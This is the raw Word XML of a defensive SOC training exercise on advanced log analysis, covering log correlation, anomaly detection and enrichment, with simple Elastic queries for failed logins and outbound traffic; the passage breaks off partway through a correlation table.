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5FE0" w14:textId="728979B9" w:rsidR="00006D15" w:rsidRDefault="00006D15" w:rsidP="00006D15">
      <w:pPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22DB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">TASK1.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00006D15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ADVANCED LOG ANALYSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FBBB17" w14:textId="77777777" w:rsidR="00006D15" w:rsidRPr="00006D15" w:rsidRDefault="00006D15" w:rsidP="00006D15">
      <w:pPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31B24D36" w14:textId="553CC539" w:rsidR="00006D15" w:rsidRPr="00006D15" w:rsidRDefault="00006D15" w:rsidP="00006D15">
      <w:pPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="284" w:hanging="142"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="00006D15">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00006D15">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The objective of Task 1 is to develop hands-on skills in log correlation, anomaly detection, and log enrichment using SIEM dashboards. This task helps you learn how to detect suspicious activities, identify attack patterns, enrich raw logs with context, and generate meaningful alerts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303764F3" w14:textId="7100405E" w:rsidR="00006D15" w:rsidRPr="00006D15" w:rsidRDefault="00006D15" w:rsidP="00006D15">
      <w:pPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="142"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00006D15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tools:</w:t>
      </w:r>
      <w:r w:rsidRPr="00006D15">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t> Elastic Security, Security Onion, Google Sheets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582895A5" w14:textId="77777777" w:rsidR="00006D15" w:rsidRPr="00006D15" w:rsidRDefault="00006D15" w:rsidP="00006D15">
      <w:pPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="142" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00006D15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tasks:</w:t>
      </w:r>
      <w:r w:rsidRPr="00006D15">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t> Correlate logs, detect anomalies, and enrich log data</w:t>
      </w:r>
      <w:r w:rsidRPr="00006D15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAB5FAB" w14:textId="6351F93A" w:rsidR="00006D15" w:rsidRPr="00C22DB6" w:rsidRDefault="00006D15" w:rsidP="00006D15">
      <w:pPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15B5AFC6" w14:textId="27F6AF83" w:rsidR="00006D15" w:rsidRDefault="00006D15" w:rsidP="00006D15">
      <w:pPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00006D15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Theoretical Knowledge — Advanced Log Analysis</w:t>
      </w:r>
      <w:r w:rsidRPr="00006D15">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A72E6F" w14:textId="21DB6889" w:rsidR="00006D15" w:rsidRPr="00006D15" w:rsidRDefault="00006D15" w:rsidP="00006D15">
      <w:pPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Log is a computer recorded activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76250D27" w14:textId="77777777" w:rsidR="00006D15" w:rsidRPr="00006D15" w:rsidRDefault="00006D15" w:rsidP="00006D15">
      <w:pPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00006D15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>1. Log Correlation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0676834A" w14:textId="77777777" w:rsidR="00006D15" w:rsidRPr="00006D15" w:rsidRDefault="00006D15" w:rsidP="00006D15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00006D15">
        <w:t>Combine multiple log sources to identify attack patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B975393" w14:textId="77777777" w:rsidR="00006D15" w:rsidRPr="00006D15" w:rsidRDefault="00006D15" w:rsidP="00006D15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00006D15">
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476DEFE4" w14:textId="77777777" w:rsidR="00006D15" w:rsidRPr="00006D15" w:rsidRDefault="00006D15" w:rsidP="00006D15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00006D15">
        <w:t>Windows Event Viewer shows repeated failed logins (Event ID 4625).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F98CE39" w14:textId="77777777" w:rsidR="00006D15" w:rsidRPr="00006D15" w:rsidRDefault="00006D15" w:rsidP="00006D15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00006D15">
        <w:t>Firewall logs show suspicious outbound traffic to unknown IPs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042C5D18" w14:textId="77777777" w:rsidR="00006D15" w:rsidRPr="00006D15" w:rsidRDefault="00006D15" w:rsidP="00006D15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00006D15">
        <w:t>Correlation = Possible brute-force → malware beaconing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FC02EA" w14:textId="77777777" w:rsidR="00006D15" w:rsidRPr="00006D15" w:rsidRDefault="00006D15" w:rsidP="00006D15">
      <w:pPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00006D15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>2. Anomaly Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43089064" w14:textId="77777777" w:rsidR="00006D15" w:rsidRPr="00006D15" w:rsidRDefault="00006D15" w:rsidP="00006D15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00006D15">
        <w:t>Detect anything that deviates from normal patterns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A982DCF" w14:textId="77777777" w:rsidR="00006D15" w:rsidRPr="00006D15" w:rsidRDefault="00006D15" w:rsidP="00006D15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00006D15">
        <w:t>User logs in at 3:00 AM (unusual time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B224419" w14:textId="77777777" w:rsidR="00006D15" w:rsidRPr="00006D15" w:rsidRDefault="00006D15" w:rsidP="00006D15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00006D15">
        <w:t>Sudden 1GB data transfer to an unknown server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9B747B" w14:textId="77777777" w:rsidR="00006D15" w:rsidRPr="00006D15" w:rsidRDefault="00006D15" w:rsidP="00006D15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00006D15">
        <w:t>Tools: Elastic Machine Learning, Sigma rules, Wazuh anomaly detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D08733" w14:textId="77777777" w:rsidR="00006D15" w:rsidRPr="00006D15" w:rsidRDefault="00006D15" w:rsidP="00006D15">
      <w:pPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00006D15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>3. Log Enrichment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DF7463" w14:textId="77777777" w:rsidR="00006D15" w:rsidRPr="00006D15" w:rsidRDefault="00006D15" w:rsidP="00006D15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00006D15">
        <w:t>Add more context to raw logs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B80D107" w14:textId="77777777" w:rsidR="00006D15" w:rsidRPr="00006D15" w:rsidRDefault="00006D15" w:rsidP="00006D15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00006D15">
        <w:t>GeoIP → Shows country of IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DFFC4C" w14:textId="77777777" w:rsidR="00006D15" w:rsidRPr="00006D15" w:rsidRDefault="00006D15" w:rsidP="00006D15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00006D15">
        <w:t>User role → Admin vs normal user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DEA1BD" w14:textId="77777777" w:rsidR="00006D15" w:rsidRPr="00006D15" w:rsidRDefault="00006D15" w:rsidP="00006D15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00006D15">
        <w:t>Reputation → From threat intel feeds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EF96FE" w14:textId="77777777" w:rsidR="00006D15" w:rsidRPr="00006D15" w:rsidRDefault="00006D15" w:rsidP="00006D15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00006D15">
        <w:t>Result: Faster and better triage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7380651D" w14:textId="77777777" w:rsidR="00006D15" w:rsidRPr="00006D15" w:rsidRDefault="00006D15" w:rsidP="00006D15">
      <w:pPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00006D15">
        <w:t>Key Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB3F762" w14:textId="77777777" w:rsidR="00006D15" w:rsidRPr="00006D15" w:rsidRDefault="00006D15" w:rsidP="00006D15">
      <w:pPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00006D15">
        <w:t>Become capable of finding hidden attacks, reducing false positives, and improving alert accuracy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9673AD" w14:textId="77777777" w:rsidR="00006D15" w:rsidRPr="00006D15" w:rsidRDefault="00006D15" w:rsidP="00006D15">
      <w:pPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27FACEA3" w14:textId="54E122FE" w:rsidR="00006D15" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00006D15">
      <w:pPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00594000">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PRACTICAL TASKS + OUTPUTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138E5F59" w14:textId="03A001EE" w:rsidR="00594000" w:rsidRPr="00834729" w:rsidRDefault="00594000" w:rsidP="00594000">
      <w:pPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00834729">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>1. Log Correlation (Elastic / Security Onion)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57ECA7B5" w14:textId="77777777" w:rsidR="00594000" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
      <w:pPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00594000">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Steps (You can perform on Elastic Cloud or local Security Onion):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014AA711" w14:textId="77777777" w:rsidR="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
      <w:pPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CEAA472" w14:textId="428EF49B" w:rsidR="00594000" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
      <w:pPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00594000">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 1: </w:t>
      </w:r>
      <w:r w:rsidRPr="00594000">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Upload Sample Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B36D26" w14:textId="77777777" w:rsidR="00594000" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
      <w:pPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00594000">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Use any public dataset (recommended: Boss of the SOC dataset).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6F2C70" w14:textId="77777777" w:rsidR="00594000" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
      <w:pPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00594000">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: </w:t>
      </w:r>
      <w:r w:rsidRPr="00594000">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Query Failed Logins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A08922A" w14:textId="77777777" w:rsidR="00594000" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
      <w:pPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00594000">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Elastic Query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF36E9B" w14:textId="68C08013" w:rsidR="00006D15" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
      <w:pPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00594000">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>&gt;&gt;event.code: 4625</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EDD7E0" w14:textId="519C3C9A" w:rsidR="00043BF2" w:rsidRPr="00594000" w:rsidRDefault="00594000">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00594000">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Step 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00594000">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>: Query Suspicious Outbound Traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38321FBB" w14:textId="5A63D27D" w:rsidR="00594000" w:rsidRDefault="00594000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">   &gt;&gt;&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00594000">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>network.direction: "outbound" AND destination.ip: *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F16E1A3" w14:textId="39DD8B53" w:rsidR="00594000" w:rsidRDefault="00594000">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00594000">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: </w:t>
      </w:r>
      <w:r w:rsidRPr="00594000">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Correlate manually in a table</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9893" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1688"/>
        <w:gridCol w:w="1393"/>
        <w:gridCol w:w="1595"/>
        <w:gridCol w:w="2128"/>
        <w:gridCol w:w="3089"/>
      </w:tblGrid>
      <w:tr w:rsidR="00594000" w:rsidRPr="00594000" w14:paraId="468B5EE4" w14:textId="77777777" w:rsidTr="00594000">
        <w:trPr>
          <w:trHeight w:val="710"/>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B5337AD" w14:textId="77777777" w:rsidR="00594000" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00594000">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Timestamp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1363" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="728BCB80" w14:textId="77777777" w:rsidR="00594000" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00594000">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Event ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1565" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="780ADDD0" w14:textId="77777777" w:rsidR="00594000" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00594000">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Source IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2098" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53EC7F8E" w14:textId="77777777" w:rsidR="00594000" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00594000">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Destination IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3044" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32E64254" w14:textId="77777777" w:rsidR="00594000" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00594000">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00594000" w:rsidRPr="00594000" w14:paraId="0BBA8381" w14:textId="77777777" w:rsidTr="00594000">
        <w:trPr>
          <w:trHeight w:val="710"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BC42A84" w14:textId="77777777" w:rsidR="00594000" w:rsidRPr="00594000" w:rsidRDefault="00594000" w:rsidP="00594000">
            <w:pPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00594000">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>2025-08-18 12:00:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1363" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
